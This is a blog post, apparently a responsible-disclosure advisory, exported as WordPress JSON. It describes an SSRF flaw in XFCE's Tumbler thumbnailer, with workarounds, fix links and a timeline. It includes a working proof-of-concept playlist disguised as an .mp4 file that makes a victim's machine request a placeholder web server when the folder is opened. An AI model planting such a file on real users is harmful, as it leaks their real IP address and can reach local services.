{"id":187,"date":"2022-08-21T14:39:28","date_gmt":"2022-08-21T08:39:28","guid":{"rendered":"https:\/\/murat.one\/?p=187"},"modified":"2022-08-21T14:43:19","modified_gmt":"2022-08-21T08:43:19","slug":"ssrf-vulnerability-in-the-tumbler-plugin-of-xfce","status":"publish","type":"post","link":"https:\/\/murat.one\/?p=187","title":{"rendered":"SSRF vulnerability in the Tumbler plugin of XFCE"},"content":{"rendered":"\n

Server-side request forgery (also known as SSRF)<\/strong> – is a vulnerability that allows an attacker to induce the application to make requests to an unintended location. I’ve found that XFCE allows sending arbitrary HTTP requests when the directory with malicious mp4 file is opened.<\/p>\n\n\n\n

Tested on:<\/strong> Debian-live-11.4.0-amd64-xfce, Kali Linux 2022.2<\/p>\n\n\n\n

Impact:<\/strong> Sensitive data exposure as IP address (for example, if user downloaded malicious mp4 file using
TOR Browser, this vulnerability anyway will leak the real IP address of user) and GStreamer version. The severity of this vulnerability is low, but I think it might be critical for Kali Linux users, who run intentionally vulnerable web applications locally (WebGoat, DVWA, etc.). Because some of them need only one HTTP request to gain code execution.<\/p>\n\n\n\n

Acknowledgements:<\/strong> BTS Digital ITSEC (because of their project this problem was detected), NitroTeam.kz (for helping with research in first steps), Ga\u00ebl Bonithon (@Tamaranch) and Alexander Schwinn (@alexxcons) for quick responses and operativeness.<\/p>\n\n\n\n

Steps to reproduce:<\/strong>
1. Create web server to accept requests or use online services like requestbin.com.
2. Create file test.mp4 with such content (payload):<\/p>\n\n\n\n

#EXTM3U\n#EXT-X-MEDIA-SEQUENCE:0\n#EXTINF:10.0,\nhttp://your_web_server\/some.mp4\n#EXT-X-ENDLIST<\/code><\/pre>\n\n\n\n
3. Open the directory that contains test.mp4. 
4. Check the web server logs, you will get GET-request to the some.mp4 file.<\/p>\n\n\n\n
Proof-of-concept<\/strong><\/p>\n\n\n\n
1. Debian 11.4.0 XFCE<\/strong><\/p>\n\n\n\n
\"\"
version info<\/figcaption><\/figure>\n\n\n\n
Content of created file xfce.mp4 with URL of our web server:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Opening directory where the file xfce.mp4 is located:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Checking web server logs:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
2. Kali Linux 2022.2<\/strong><\/p>\n\n\n\n
\"\"
version info<\/figcaption><\/figure>\n\n\n\n
\"\"
content of created file test.mp4 with URL of our web server<\/figcaption><\/figure>\n\n\n\n
\"\"
opening directory with malicious mp4<\/figcaption><\/figure>\n\n\n\n
\"\"
logs of Burp Collaborator<\/figcaption><\/figure>\n\n\n\n
If you didn’t want to update your XFCE, you can use workarounds below. But the official fix is also available.<\/p>\n\n\n\n
Workaround<\/strong> #1<\/p>\n\n\n\n
Go the preferences of your file manager and disable showing thumbnails:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
It will prevent creating thumbnails, so also SSRF.<\/p>\n\n\n\n
Workaround #2<\/strong><\/p>\n\n\n\n
Disable GStreamer plugin (Disabled=true) in \/etc\/xdg\/tumbler\/tumbler.rc<\/strong> then reboot or run <\/p>\n\n\n\n
pkill tumblerd<\/code><\/pre>\n\n\n\n
Official fix<\/strong><\/p>\n\n\n\n
Link to the official fix – https:\/\/mail.xfce.org\/pipermail\/xfce-announce\/2022-August\/001133.html<\/a>
Commit – https:\/\/gitlab.xfce.org\/xfce\/tumbler\/-\/commit\/a0fc191e8ab41fe579f3333085d649fdacb2daa5<\/a><\/p>\n\n\n\n
Timeline of the vulnerability<\/strong><\/p>\n\n\n\n
07\/30\/2022 \u2013 initial discover and creating confidential issue (https:\/\/gitlab.xfce.org\/xfce\/tumbler\/-\/issues\/65<\/a>)
07\/31\/2022 \u2013 requesting MITRE to assign CVE id (still ignoring me even with the links to the official fix)
08\/01\/2022 \u2013 vendor reproduced the problem
08\/02\/2022 \u2013 vendor created the patch
08\/12\/2022 \u2013 vendor released fixed version
08\/21\/2022 – the confidentiality of issue was removed, vendor created upstream issue to Gstreamer (https:\/\/gitlab.freedesktop.org\/gstreamer\/gstreamer\/-\/issues\/1392<\/a>), published<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
SSRF vulnerability was found in Tumbler plugin of XFCE. It works on the latest Debian and Kali Linux, and high likely on all Linux distributions with out-of-date XFCE.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[14,1],"tags":[35,38,36,37,39,34],"_links":{"self":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/187"}],"collection":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=187"}],"version-history":[{"count":7,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/187\/revisions"}],"predecessor-version":[{"id":204,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/187\/revisions\/204"}],"wp:attachment":[{"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=187"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=187"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=187"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}